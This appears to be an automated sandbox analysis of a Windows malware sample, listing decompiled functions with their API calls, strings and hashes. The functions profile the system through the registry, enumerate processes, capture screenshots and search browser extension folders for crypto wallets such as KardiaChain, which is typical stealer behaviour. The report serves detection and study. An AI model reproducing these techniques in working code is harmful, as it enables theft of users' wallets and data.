RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?), ref: 00490E0D
RegCloseKey.ADVAPI32(?), ref: 00490E18
CharToOemA.USER32(?,?), ref: 00490E2B

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00490DE1
ProcessorNameString, xrefs: 00490E07

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
API String ID: 2235053359-2804670039
Opcode ID: c237c8f1da37a41a9e90317740f145dbb6177b42e47a7d49ed1475d495ffa043
Instruction ID: dac7252edb339d53bca35717811a975d0f8edd1b84d8fed9b14a6a6daca79a94
Opcode Fuzzy Hash: c237c8f1da37a41a9e90317740f145dbb6177b42e47a7d49ed1475d495ffa043
Instruction Fuzzy Hash: 15219275208346AFD720DF10DC49FABBBE8EBD5704F108D2EF58987191E7B4A5088B96

Uniqueness

Uniqueness Score: -1.00%

Function 00490F30, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00490F6D
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 00490F8B
RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 00490FAD
RegCloseKey.ADVAPI32(?), ref: 00490FB8
CharToOemA.USER32(?,?), ref: 00490FCB

Strings

ProductName, xrefs: 00490FA7
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00490F81

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 2235053359-1787575317
Opcode ID: 2dc4d3b5163da3d879576930cb0971a4e3795d9dbc9fd179c575c914ee7f2a20
Instruction ID: be9c2be7ac265e0429e7c48a7795dc7e79d438741db4c637319d9a70996166a6
Opcode Fuzzy Hash: 2dc4d3b5163da3d879576930cb0971a4e3795d9dbc9fd179c575c914ee7f2a20
Instruction Fuzzy Hash: E621C575208346AFD720DF10DC49FABBBE8EBD4704F10892EF58987191D7B4A1088B96

Uniqueness

Uniqueness Score: -1.00%

Function 00495950, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,00000024,2D794ED1), ref: 004959C9
__time64.LIBCMT ref: 004959D0

Part of subcall function 0049D44C: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004959D5,00000000), ref: 0049D457
Part of subcall function 0049D44C: __aulldiv.LIBCMT ref: 0049D477

Part of subcall function 00493050: _malloc.LIBCMT ref: 00493057
Part of subcall function 00493050: GetTickCount.KERNEL32 ref: 00493064
Part of subcall function 00493050: _rand.LIBCMT ref: 00493080
Part of subcall function 00493050: _sprintf.LIBCMT ref: 00493095

Part of subcall function 0049FE88: __getptd.LIBCMT ref: 0049FE8D

_rand.LIBCMT ref: 00495A05

Part of subcall function 0049FE9A: __getptd.LIBCMT ref: 0049FE9A

std::_Xinvalid_argument.LIBCPMT ref: 00495A1C

Strings

invalid string position, xrefs: 00495A17
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 0049598A

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time__getptd_rand$CountFileSleepSystemTickXinvalid_argument__aulldiv__time64_malloc_sprintfstd::_
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$invalid string position
API String ID: 3490354527-3173898365
Opcode ID: 357e6f8e4c1c543a149263cccda9c748d442fccebcd230183d73eb6c61cf46b5
Instruction ID: 6801e1378f72f6fa28ec371c07371dd7753675c767b4f3e7db2a2a0bdb9decb4
Opcode Fuzzy Hash: 357e6f8e4c1c543a149263cccda9c748d442fccebcd230183d73eb6c61cf46b5
Instruction Fuzzy Hash: 864192B1A00644ABDF15DFA5D881BAEBBF5FF84704F20013EF502A7281DBB85905CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00495B50, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00495BC6
OpenProcess.KERNEL32(00000410,00000000,?,747DF510,?,00000000,00000000,004B76C0,000000FF), ref: 00495BD5
EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00495BEC
GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,?), ref: 00495C03
CloseHandle.KERNEL32(00000000), ref: 00495C09

Strings

<unknown>, xrefs: 00495B9D

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen_memset
String ID: <unknown>
API String ID: 601403599-1574992787
Opcode ID: e46e3a2179ccf2919aaaf58cfad6f48ef90f43791817674302e6eb898ca9c5cb
Instruction ID: 9536f0ebb8a1b929c29d2b72b5e560e1c46f4cb7cedc00f495ac57ce8f04f565
Opcode Fuzzy Hash: e46e3a2179ccf2919aaaf58cfad6f48ef90f43791817674302e6eb898ca9c5cb
Instruction Fuzzy Hash: 6D316171504248AFDB10DF65DD85AEF7BB8FB58700F00453EFA499B240DB745A48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004160D0, Relevance: 10.6, APIs: 7, Instructions: 74filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004160E8
GetFileSizeEx.KERNEL32(00000000,?), ref: 00416103
LocalAlloc.KERNEL32(00000040,?), ref: 00416122
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0041613E
CloseHandle.KERNEL32(00000000,00000000), ref: 00416158
LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 0041616C
CloseHandle.KERNEL32(00000000), ref: 00416175

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
String ID:
API String ID: 2550598358-0
Opcode ID: ea1ed4f663f210bf279e9be9a4c724b4941ff26b702b3d7a999a323d08abd69b
Instruction ID: 8f4aa0cb0259d60c456a7e28e24e9842decc99eb3486f1dac33458421606f435
Opcode Fuzzy Hash: ea1ed4f663f210bf279e9be9a4c724b4941ff26b702b3d7a999a323d08abd69b
Instruction Fuzzy Hash: 5711AF71200204BFD7109F68EC84AABB7BCFB857A4F01462EF94492250DB74DD48CA66

Uniqueness

Uniqueness Score: -1.00%

Function 00493210, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51memoryfilewindowCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010,00000000,00000000), ref: 00493226
GdipCreateBitmapFromHBITMAP.GDIPLUS(?), ref: 00493247
GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000,00000000,00000000), ref: 0049327C

Strings

screenshot.jpg, xrefs: 00493276
4I, xrefs: 00493239
image/jpeg, xrefs: 0049325F

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Gdip$AllocBitmapCreateFileFromImageSave
String ID: 4I$image/jpeg$screenshot.jpg
API String ID: 2335731563-1775685956
Opcode ID: 77a6ec751a7033276775a4eadda5c8d2b569e27150823061d7e87b14f3758873
Instruction ID: 59c94c5ec6955f5a8af1cdd0256f6d5871432531573287e647d274b9cc819e22
Opcode Fuzzy Hash: 77a6ec751a7033276775a4eadda5c8d2b569e27150823061d7e87b14f3758873
Instruction Fuzzy Hash: F701C471600301AFD710DF55D942B1BBBE4EFC9B01F50892EF48997240DB78EA0487E6

Uniqueness

Uniqueness Score: -1.00%

Function 0049C971, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0049C98B

Part of subcall function 0049E04E: __FF_MSGBANNER.LIBCMT ref: 0049E067
Part of subcall function 0049E04E: __NMSG_WRITE.LIBCMT ref: 0049E06E
Part of subcall function 0049E04E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A0B2E,00000000,00000001,00000000,?,004A75C4,00000018,004CF090,0000000C,004A7654), ref: 0049E093

std::exception::exception.LIBCMT ref: 0049C9C0
std::exception::exception.LIBCMT ref: 0049C9DA
__CxxThrowException@8.LIBCMT ref: 0049C9EB

Strings

P-@, xrefs: 0049C9A3
bad allocation, xrefs: 0049C9B9

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: P-@$bad allocation
API String ID: 615853336-1329529977
Opcode ID: 947a0ab379d0fb12964c54183797623f7a8b992c1ffabfa6080dd38af0b9f357
Instruction ID: baa4dd520f34c1804c13deedcca7e244aa2bb1314d8136e224ff5042320ae75c
Opcode Fuzzy Hash: 947a0ab379d0fb12964c54183797623f7a8b992c1ffabfa6080dd38af0b9f357
Instruction Fuzzy Hash: 32F02DB05411095BCF10EB55DC86E9D7FA89B80318F10013FF804A62D2DBBC8A008B5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E947, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004930F0: GetFileAttributesA.KERNEL32(?,00407054,00000000), ref: 004930F5

FindNextFileA.KERNELBASE(?,?), ref: 0040EACF
FindClose.KERNEL32(?), ref: 0040EADE

Strings

Wallets, xrefs: 0040EA36
\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk, xrefs: 0040E998
KardiaChain, xrefs: 0040EA12

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$AttributesCloseNext
String ID: KardiaChain$Wallets$\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
API String ID: 730532403-811050526
Opcode ID: 7a2db4b78275a552c8e40fa6c36c770aacd40ecc0bc91a24b66d579c2406f31f
Instruction ID: e88135c4a70784839d7248850c3e8d3fc8f132e2066831d5381241641caa25fd
Opcode Fuzzy Hash: 7a2db4b78275a552c8e40fa6c36c770aacd40ecc0bc91a24b66d579c2406f31f
Instruction Fuzzy Hash: 9241A6B15183805BC236EB75D8528DFB7ACAFD9314F400A2EE585572D2EB346604CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00493320, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS ref: 00493350
GetSystemMetrics.USER32(00000000), ref: 00493357
GetSystemMetrics.USER32(00000001), ref: 00493361

Part of subcall function 004932B0: SelectObject.GDI32(00000000,00000000), ref: 004932DB
Part of subcall function 004932B0: DeleteObject.GDI32(00000000), ref: 00493312

GdiplusShutdown.GDIPLUS(?), ref: 0049337F

Strings

screenshot.jpg, xrefs: 00493367

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: GdiplusMetricsObjectSystem$DeleteSelectShutdownStartup
String ID: screenshot.jpg
API String ID: 654883086-673422685
Opcode ID: 7f22bac0b2c61c0920552f2ec088bc8bfd32d7994bec497776c2dc1517278c90
Instruction ID: 8c784b11513f6988e73a0c015c231527d2dfc230300657a9e1fbeef5535ab53f
Opcode Fuzzy Hash: 7f22bac0b2c61c0920552f2ec088bc8bfd32d7994bec497776c2dc1517278c90
Instruction Fuzzy Hash: 82F089B11083006FD300EF55DD46F4B7FA4EF80B08F40455DF545561C2D7B981088BEA

Uniqueness

Uniqueness Score: -1.00%

Function 00498B40, Relevance: 7.6, APIs: 5, Instructions: 127timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,00000000,?,?,0049A7E7,?,?,00000000,00000000,00000010), ref: 00498B94
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,0049A7E7,?,?,00000000,00000000), ref: 00498BC1
GetLocalTime.KERNEL32(?,?,?,0049A7E7,?,?,00000000,00000000,00000010,00000000), ref: 00498C06
SystemTimeToFileTime.KERNEL32(?,?,?,?,0049A7E7,?,?,00000000,00000000,00000010,00000000), ref: 00498C16
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00498C53

Part of subcall function 00498570: GetFileInformationByHandle.KERNEL32(?,?,?,?), ref: 004985A6

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 89576305-0
Opcode ID: 8de9f16e28c943ed37f5d46d155a9b6da7c04f9b91277517f3cfe4386719e072
Instruction ID: 17ee11142aad87d9e1524ee9e71412c506f87eb4d94cfcf7d0711618822b5b06
Opcode Fuzzy Hash: 8de9f16e28c943ed37f5d46d155a9b6da7c04f9b91277517f3cfe4386719e072
Instruction Fuzzy Hash: 524184B15047449FD724DF2DD88096BFBE8FB98314F404A2EF59A83650EB35E848CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00498840, Relevance: 7.6, APIs: 5, Instructions: 124fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,00499ACF,?,?,?), ref: 00498894
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000000,00000080,00000000,00000000,00000000,00499ACF,?,?,?), ref: 004988CE

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: 3921cb8763274d03bae0c686f506cdeec3130fb530ea04b05ea8bcb4bb943b30
Instruction ID: e9b6aeef278d83f94250be4833e93a3f72fcc0d2092cafd1c5e3e215c5bd97f2
Opcode Fuzzy Hash: 3921cb8763274d03bae0c686f506cdeec3130fb530ea04b05ea8bcb4bb943b30
Instruction Fuzzy Hash: 04415EB25047009FDB309F6C9884B6BBBD8E795325F108A3FF196C6650C674D884CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0049E7C7, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0049E7D5

Part of subcall function 0049E04E: __FF_MSGBANNER.LIBCMT ref: 0049E067
Part of subcall function 0049E04E: __NMSG_WRITE.LIBCMT ref: 0049E06E
Part of subcall function 0049E04E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A0B2E,00000000,00000001,00000000,?,004A75C4,00000018,004CF090,0000000C,004A7654), ref: 0049E093

_free.LIBCMT ref: 0049E7E8

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 85b161982d99ff21d147067a8aff796a723b2ca6d5cb82450ff7446860f05810
Instruction ID: c7e1d6fb654a31e4fc33791518c3b6fe2ab0cde5dd2fe23b7239b19863cad0fb
Opcode Fuzzy Hash: 85b161982d99ff21d147067a8aff796a723b2ca6d5cb82450ff7446860f05810
Instruction Fuzzy Hash: 21112B32441511A7CF21FBB7AC0465A3F959B613B0B21467FF4489B251EE7CC841865D

Uniqueness

Uniqueness Score: -1.00%

Function 00402FA0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00403039

Part of subcall function 0049C32E: std::exception::_Copy_str.LIBCMT ref: 0049C349

__CxxThrowException@8.LIBCMT ref: 0040304E

Part of subcall function 0049C9F1: RaiseException.KERNEL32(S0@,?,2D794ED1,004BB6BC,00403053,?,004CB4C0,?,2D794ED1), ref: 0049CA33

Part of subcall function 00402EE0: std::exception::exception.LIBCMT ref: 00402F10
Part of subcall function 00402EE0: __CxxThrowException@8.LIBCMT ref: 00402F27

_memmove.LIBCMT ref: 00403095

Strings

P-@, xrefs: 00403047

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
String ID: P-@
API String ID: 163498487-3305893085
Opcode ID: ad458e2c040e3c4bd94719bcd4f928a806056c6073082542b250864c841e042f
Instruction ID: 8abb1a78577fe6a0bbecbf7ab086c6365ff3b43973a43b2c898c643c438534f5
Opcode Fuzzy Hash: ad458e2c040e3c4bd94719bcd4f928a806056c6073082542b250864c841e042f
Instruction Fuzzy Hash: CE41B371911205ABCB14DF69C881A9EBFF8EB09364F50423FE816A73C1D7799A40CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00416475, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?), ref: 00416519

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

_fprintf.LIBCMT ref: 004164D2
_fprintf.LIBCMT ref: 004164DD

Part of subcall function 0049CF02: __lock_file.LIBCMT ref: 0049CF49
Part of subcall function 0049CF02: __stbuf.LIBCMT ref: 0049CFCD
Part of subcall function 0049CF02: __output_l.LIBCMT ref: 0049CFDD
Part of subcall function 0049CF02: __ftbuf.LIBCMT ref: 0049CFE7

Strings

%s%s, xrefs: 004164CC

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$DeleteFile__fsopen__ftbuf__lock_file__output_l__stbuf
String ID: %s%s
API String ID: 2213557054-2561119221
Opcode ID: 5b808c69128959b447e12eb132bd504b8ed487555c0b71959ac1489be10229dd
Instruction ID: dff350930be7dd991d9a0eb1f9eb56c0da1284c2cdc090c8a803d1185b4c12d2
Opcode Fuzzy Hash: 5b808c69128959b447e12eb132bd504b8ed487555c0b71959ac1489be10229dd
Instruction Fuzzy Hash: 3D11E7B690430067C924F772AC83EDF73985F94B05F01883EF54997242EA3DE90583AE

Uniqueness

Uniqueness Score: -1.00%

Function 00414A10, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00414A1B
_strcpy_s.LIBCMT ref: 00414A32
_memset.LIBCMT ref: 00414A51

Strings

1BEF0A57BE110FD467A, xrefs: 00414A24

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$_strcpy_s
String ID: 1BEF0A57BE110FD467A
API String ID: 1261871945-2910601657
Opcode ID: 88a9e5dfc9833a836808a1ab1ae1f9eb64d6c2832a00b5ef89d707f368bcbc5e
Instruction ID: 7bdc023e39880342543e07bcad02bf11e1c7d3a236515f781d168fd2557a93ae
Opcode Fuzzy Hash: 88a9e5dfc9833a836808a1ab1ae1f9eb64d6c2832a00b5ef89d707f368bcbc5e
Instruction Fuzzy Hash: CFF081706417009FD360DF55D981A4BBBE0FF88B00F40891EF58A97780D778F8008B95

Uniqueness

Uniqueness Score: -1.00%

Function 00403590, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00403604
_memmove.LIBCMT ref: 00403653

Part of subcall function 00403370: std::_Xinvalid_argument.LIBCPMT ref: 0040338A

Strings

string too long, xrefs: 004035FF

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 8ddb8f73657c67b8d99f0d8c65acb5de563212b2b12bf668aaf90fc68cb1f2af
Instruction ID: f3144821c85a426eb57cb42337321211df6be9b4418fb5f9bd87335f55164839
Opcode Fuzzy Hash: 8ddb8f73657c67b8d99f0d8c65acb5de563212b2b12bf668aaf90fc68cb1f2af
Instruction Fuzzy Hash: 2531B132310610ABD6349E5C998491BEBEDEBA6752B200D3FF081D73D1C779DD4483A9

Uniqueness

Uniqueness Score: -1.00%

Function 00402EE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00402F10
__CxxThrowException@8.LIBCMT ref: 00402F27

Part of subcall function 0049C971: _malloc.LIBCMT ref: 0049C98B

Strings

P-@, xrefs: 00402F1F

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: P-@
API String ID: 4063778783-3305893085
Opcode ID: de4eb0811e515174f1e0ab2f38256ed43550b44e79a2168ea488ecab0f3b96f1
Instruction ID: 2114a16a42231c71bcb0b93c713675b90cb9aa66d50eb15868f11b98fe17692c
Opcode Fuzzy Hash: de4eb0811e515174f1e0ab2f38256ed43550b44e79a2168ea488ecab0f3b96f1
Instruction Fuzzy Hash: DFE09BB550830256C714EB30D656B5F77E49F90748F40463FF849512C1FBB8C90C95AB

Uniqueness

Uniqueness Score: -1.00%

Function 0049BB6D, Relevance: 4.6, APIs: 3, Instructions: 74COMMON

Download Yara Rule

APIs

std::_Xfsopen.LIBCPMT ref: 0049BB25
std::_Xfsopen.LIBCPMT ref: 0049BB41
_fseek.LIBCMT ref: 0049BB58

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xfsopenstd::_$_fseek
String ID:
API String ID: 1675860589-0
Opcode ID: 0bbbabea576089d255a41a4a16e95bd6f14b0b852e35b21abb365bd5d854cda0
Instruction ID: 6e03f1c9c023a1bb6e96eb0dbc9276985dc70b8243a825ee657704252d1381d9
Opcode Fuzzy Hash: 0bbbabea576089d255a41a4a16e95bd6f14b0b852e35b21abb365bd5d854cda0
Instruction Fuzzy Hash: 46110432A012096BEF240555BE42F7B3E88EB10790F180036FE45966D9EB2DEC0286DD

Uniqueness

Uniqueness Score: -1.00%

Function 00414C90, Relevance: 4.5, APIs: 3, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,747C81D0,0040524C,?,00000000), ref: 00414CB7
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00414CE3
CloseHandle.KERNEL32(00000000), ref: 00414CEA

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 22a5ad6fb972835ff29a39c35de5eacc8fdd7b04dd25e7983903f42dd1430e72
Instruction ID: 7c9b1b86db29d077eea8834f21ce44fe0ab945c4bda4cf9008310446598d7ad7
Opcode Fuzzy Hash: 22a5ad6fb972835ff29a39c35de5eacc8fdd7b04dd25e7983903f42dd1430e72
Instruction Fuzzy Hash: 94F06872215210BFE350DA5CEC49FD7B398FB98720F01472AF641965D0D7B4A8D5C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00491090, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32 ref: 004910B9

Strings

Unknown, xrefs: 004910F3

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: c8191daa23f04e2e674e54d1434ef376ef539dedb6e11d01e00ae4d0af2722ec
Instruction ID: 1dca38e6d33bbff110bfa5f00d950b97ce549fd1d44997843e736f11a701c109
Opcode Fuzzy Hash: c8191daa23f04e2e674e54d1434ef376ef539dedb6e11d01e00ae4d0af2722ec
Instruction Fuzzy Hash: 7201AD702083439FEB20CF14C955BA7BBE8FB94344F00C82EE4C587290EB799508C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00498EE0, Relevance: 3.1, APIs: 2, Instructions: 70fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00498F18
ReadFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,00499019,?,00004000,?,00000000,?,00000000,0049AD75), ref: 00498F58

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead_memmove
String ID:
API String ID: 1325644223-0
Opcode ID: d32d7169465e6f9c0fee8bf0f63942b69d8b0c78c02e0ea8ab4bd7a203931393
Instruction ID: 22f8bd3c63c0c8d62a1a3667792a107d0147ca9fcb685651b91fc586e4ac01e1
Opcode Fuzzy Hash: d32d7169465e6f9c0fee8bf0f63942b69d8b0c78c02e0ea8ab4bd7a203931393
Instruction Fuzzy Hash: DC113076700B009FE720DA6AD884E6BBBE9EBD5755F14482EF295C7211DA30EC048775

Uniqueness

Uniqueness Score: -1.00%

Function 004998E0, Relevance: 3.1, APIs: 2, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,00000000,0049A7CC,?,00000000,00000000,00000010,00000000), ref: 00499924

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: cdc1c6167063303ea431aedcc57b2ed6f6fd16707f01f04caeed30ab34470481
Instruction ID: ffb083f055a5d4f45eea38dd66a30a454ab90c570d03346e7828a5fe316b079d
Opcode Fuzzy Hash: cdc1c6167063303ea431aedcc57b2ed6f6fd16707f01f04caeed30ab34470481
Instruction Fuzzy Hash: 90018CB26017046FD720AE7DA8C4BA7FBDCE799365F10463FF255D2250CA715C448628

Uniqueness

Uniqueness Score: -1.00%

Function 0049CE8E, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 004A284D: __getptd_noexit.LIBCMT ref: 004A284D

__lock_file.LIBCMT ref: 0049CED5

Part of subcall function 0049EF03: __lock.LIBCMT ref: 0049EF28

__fclose_nolock.LIBCMT ref: 0049CEE0

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: c33f17dc16e716d29f44a449a954cdf2558f2731f3c10b0fa2b5c6e9486229b6
Instruction ID: 31e64612cf3375bf0150db2a0dc749f147d9f732d8ab72768d4a3f3751f10d02
Opcode Fuzzy Hash: c33f17dc16e716d29f44a449a954cdf2558f2731f3c10b0fa2b5c6e9486229b6
Instruction Fuzzy Hash: FBF096318417059ADF10AB7A884275F7FA06F11339F20C22FB432AA1D1C77C4A016B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004A63F3, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 004A640B

Part of subcall function 004A7639: __mtinitlocknum.LIBCMT ref: 004A764F
Part of subcall function 004A7639: __amsg_exit.LIBCMT ref: 004A765B
Part of subcall function 004A7639: EnterCriticalSection.KERNEL32(00000000,00000000,?,004A4DFA,0000000D), ref: 004A7663

__tzset_nolock.LIBCMT ref: 004A641C

Part of subcall function 004A5D12: __lock.LIBCMT ref: 004A5D34
Part of subcall function 004A5D12: ____lc_codepage_func.LIBCMT ref: 004A5D7B
Part of subcall function 004A5D12: __getenv_helper_nolock.LIBCMT ref: 004A5D9D
Part of subcall function 004A5D12: _free.LIBCMT ref: 004A5DD4
Part of subcall function 004A5D12: _strlen.LIBCMT ref: 004A5DDB
Part of subcall function 004A5D12: __malloc_crt.LIBCMT ref: 004A5DE2
Part of subcall function 004A5D12: _strlen.LIBCMT ref: 004A5DF8
Part of subcall function 004A5D12: _strcpy_s.LIBCMT ref: 004A5E06
Part of subcall function 004A5D12: __invoke_watson.LIBCMT ref: 004A5E1B
Part of subcall function 004A5D12: _free.LIBCMT ref: 004A5E2A

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
